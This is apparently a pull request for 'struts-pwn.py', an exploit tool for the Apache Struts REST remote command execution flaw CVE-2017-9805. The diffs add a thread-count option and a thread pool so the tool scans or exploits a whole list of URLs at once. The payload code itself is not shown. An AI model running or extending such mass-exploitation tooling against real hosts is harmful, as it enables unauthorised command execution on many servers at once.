### PR TITLE
Added multithreading support.

### DIFF
--- a/struts-pwn.py
+++ b/struts-pwn.py
@@ -8,7 +8,10 @@
 # https://github.com/rapid7/metasploit-framework/pull/8924
 # https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/
 # *****************************************************
-from multiprocessing.pool import ThreadPool
+try:
+    from concurrent.futures import ThreadPoolExecutor
+except ImportError:
+    from multiprocessing.pool import ThreadPool as ThreadPoolExecutor
 import threading
 import argparse
 import requests
@@ -330,8 +333,9 @@ def main(url=url, usedlist=usedlist, cmd=cmd, threads=threads, do_exploit=do_exp
                 with plock:
                     print("[$] Request sent.")
                     print("[.] If the host is vulnerable, the command will be executed in the background.")
-        pool = ThreadPool(threads)
-        pool.map(worker, URLs_List)
+        pool = ThreadPoolExecutor(threads)
+        for x in pool.map(worker, URLs_List):
+            pass
 
     print('[%] Done.')
 

--- a/struts-pwn.py
+++ b/struts-pwn.py
@@ -43,10 +43,18 @@ parser.add_argument("--exploit",
                     dest="do_exploit",
                     help="Exploit.",
                     action='store_true')
+parser.add_argument("-t", "--threads",
+                    dest="threads",
+                    help="Number of threads",
+                    action="store",
+                    type=int,
+                    default=10)
+
 args = parser.parse_args()
 url = args.url if args.url else None
 usedlist = args.usedlist if args.usedlist else None
 cmd = args.cmd if args.cmd else None
+threads = args.threads
 do_exploit = args.do_exploit if args.do_exploit else None
 
 
@@ -274,7 +282,7 @@ AAoAAQACABYAEAAJ</byte-array>
     return(result)
 
 
-def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
+def main(url=url, usedlist=usedlist, cmd=cmd, threads=threads, do_exploit=do_exploit):
     if url:
         if not do_exploit:
             result = check(url)
@@ -303,7 +311,9 @@ def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
             print('Error: There was an error in reading list file.')
             print("Exception: " + str(e))
             exit(1)
-        for url in URLs_List:
+        
+        plock = threading.Lock()
+        def worker(url):
             if not do_exploit:
                 result = check(url)
                 output = '[*] Status: '
@@ -311,17 +321,21 @@ def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
                     output += 'Vulnerable!'
                 else:
                     output += 'Not Affected.'
-                print(output)
+                with plock:
+                    print(output)
             else:
                 exploit(url, cmd)
-                print("[$] Request sent.")
-                print("[.] If the host is vulnerable, the command will be executed in the background.")
-
+                with plock:
+                    print("[$] Request sent.")
+                    print("[.] If the host is vulnerable, the command will be executed in the background.")
+        pool = ThreadPool(threads)
+        pool.map(worker, URLs_List) 
+                    
     print('[%] Done.')
 
 if __name__ == '__main__':
     try:
-        main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
+        main(url=url, usedlist=usedlist, cmd=cmd, threads=threads, do_exploit=do_exploit)
     except KeyboardInterrupt:
         print('\nKeyboardInterrupt Detected.')
         print('Exiting...')

--- a/struts-pwn.py
+++ b/struts-pwn.py
@@ -8,6 +8,8 @@
 # https://github.com/rapid7/metasploit-framework/pull/8924
 # https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/
 # *****************************************************
+from multiprocessing.pool import ThreadPool
+import threading
 import argparse
 import requests
 import sys
@@ -311,7 +313,7 @@ def main(url=url, usedlist=usedlist, cmd=cmd, threads=threads, do_exploit=do_exp
             print('Error: There was an error in reading list file.')
             print("Exception: " + str(e))
             exit(1)
-        
+
         plock = threading.Lock()
         def worker(url):
             if not do_exploit:
@@ -329,8 +331,8 @@ def main(url=url, usedlist=usedlist, cmd=cmd, threads=threads, do_exploit=do_exp
                     print("[$] Request sent.")
                     print("[.] If the host is vulnerable, the command will be executed in the background.")
         pool = ThreadPool(threads)
-        pool.map(worker, URLs_List) 
-                    
+        pool.map(worker, URLs_List)
+
     print('[%] Done.')
 
 if __name__ == '__main__':


### PR DESCRIPTION
I added multithreading support that works for Python 2.7 and 3.X. It prefers to use `concurrent.futures.ThreadPoolExecutor` which can be installed by using `python2.7 -m pip install futures`. This PR adds an optional parameter (`-t`/`--threads`) that is only to be used when `--list` is defined and creates a thread pool that executes scanning/exploiting on each url in the provided list.